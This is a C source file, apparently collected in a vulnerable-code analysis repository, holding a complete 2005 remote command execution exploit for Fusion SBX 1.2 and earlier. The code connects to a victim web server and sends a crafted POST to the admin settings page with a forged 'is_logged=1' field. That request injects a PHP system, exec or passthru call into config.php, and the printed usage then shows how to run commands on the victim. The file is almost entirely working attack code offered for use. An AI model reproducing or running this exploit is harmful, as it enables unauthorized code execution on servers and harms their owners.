lilbool/vuln-code-analysis
0
1/*****************************************************
2* *
3* [Fusion SBX <= 1.2] exploit *
4* *
5* sileFSBXxpl *
6* *
7* This exploit use vulnerability found into *
8* Fusion SBX and create new variable and call it *
9* with a malicious function (stored in config.php). *
10* This exploit utilize injection of three diverse *
11* procedures for execution of arbitrary code on *
12* vulnerable machine with httpd privileges. *
13* *
14* References: www.securityfocus.org/bid/13575 *
15* *
16* coded by: Silentium of Anacron Group Italy *
17* date: 10/05/2005 *
18* e-mail: anacrongroupitaly[at]autistici[dot]org *
19* my_home: www.autistici.org/anacron-group-italy *
20* *
21* this tool is developed under GPL license *
22* no(c) .:. copyleft *
23* *
24*****************************************************/
25
26#include <stdio.h>
27#include <stdlib.h>
28#include <sys/types.h>
29#include <sys/socket.h>
30#include <netinet/in.h>
31#include <netdb.h>
32
33#define PORT 80 // port of web server
34
35void info(void);
36void banner(void);
37void sendxpl(FILE *out, char *argv[], int type);
38void errsock(void);
39void errgeth(void);
40void errconn(char *argv[]);
41
42
43int main(int argc, char *argv[]){
44
45FILE *out;
46int sock, sockconn, type;
47struct sockaddr_in addr;
48struct hostent *hp;
49
50if(argc!=4)
51 info();
52
53type = atoi(argv[3]);
54
55if(type < 1 || type > 3)
56 info();
57
58banner();
59
60if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
61 errsock();
62
63 printf("[*] Creating socket [OK]\n");
64
65if((hp = gethostbyname(argv[1])) == NULL)
66 errgeth();
67
68 printf("[*] Resolving victim host [OK]\n");
69
70memset(&addr,0,sizeof(addr));
71memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
72addr.sin_family = AF_INET;
73addr.sin_port = htons(PORT);
74
75sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
76if(sockconn < 0)
77 errconn(argv);
78
79 printf("[*] Connecting at victim host [OK]\n");
80
81out = fdopen(sock,"a");
82setbuf(out,NULL);
83
84sendxpl(out,argv,type);
85
86 printf("[*] Now test at execute code on\n\n"
87 "[1] %s%sindex.php?sile=id\n"
88 "[2] %s%sadmin/index.php?sile=id\n\n",argv[1],argv[2],argv[1],argv[2]);
89
90shutdown(sock,2);
91close(sock);
92
93return 0;
94
95}
96
97
98void info(void){
99
100system("clear");
101printf("\n #########################################\n"
102 " # sileFSBXxpl #\n"
103 " # ################################### #\n"
104 " # Fusion SBX <= 1.2 exploit #\n"
105 " # Remote Command Execution #\n"
106 " # coded by Silentium #\n"
107 " # [ Anacron Group Italy ] #\n"
108 " # ################################### #\n"
109 " # www.autistici.org/anacron-group-italy #\n"
110 " #########################################\n\n"
111 " [Usage]\n\n"
112 " sileFSBXxpl <victim> <path_sbx> <type>\n\n"
113 " [Type]\n\n"
114 " 1) injection of system()\n"
115 " 2) injection of exec()\n"
116 " 3) injection of passthru()\n\n"
117 " [Example]\n\n"
118 " sileFSBXxpl www.victim.com /sbx/ 1\n\n");
119exit(1);
120
121}
122
123
124void banner(void){
125
126system("clear");
127printf("[-] sileFSBXxpl\n"
128 " ============\n"
129 "[-] Fusion SBX <= 1.2 exploit\n"
130 "[-] coded by Silentium - Anacron Group Italy\n"
131 "[-] www.autistici.org/anacron-group-italy\n\n");
132
133}
134
135
136void sendxpl(FILE *out, char *argv[], int type){
137
138char *call;
139int size = 245;
140
141if(type == 1)
142 call = "system";
143else if(type == 2)
144 call = "exec";
145else if(type == 3)
146 call = "passthru";
147
148size+=strlen(call);
149
150fprintf(out,"POST %sadmin/?settings HTTP/1.0\n"
151 "Connection: Keep-Alive\n"
152 "Pragma: no-cache\n"
153 "Cache-control: no-cache\n"
154 "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
155 "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
156 "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
157 "Accept-Language: en\n"
158 "Host: %s\n"
159 "Content-Type: application/x-www-form-urlencoded\n"
160 "Content-Length: %d\n\n"
161 "set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
162 "refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"
163 "2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
164 "&setsubmit=Commit+Changes&is_logged=1\n\n",argv[2],argv[1],size,call);
165
166 printf("[*] Sending exploit [OK]\n\n");
167
168}
169
170
171void errsock(void){
172
173system("clear");
174printf("[x] Creating socket [FAILED]\n\n");
175exit(1);
176
177}
178
179
180void errgeth(void){
181
182printf("[x] Resolving victim host [FAILED]\n\n");
183exit(1);
184
185}
186
187
188void errconn(char *argv[]){
189
190printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]);
191exit(1);
192
193}
194
195// milw0rm.com [2005-05-20]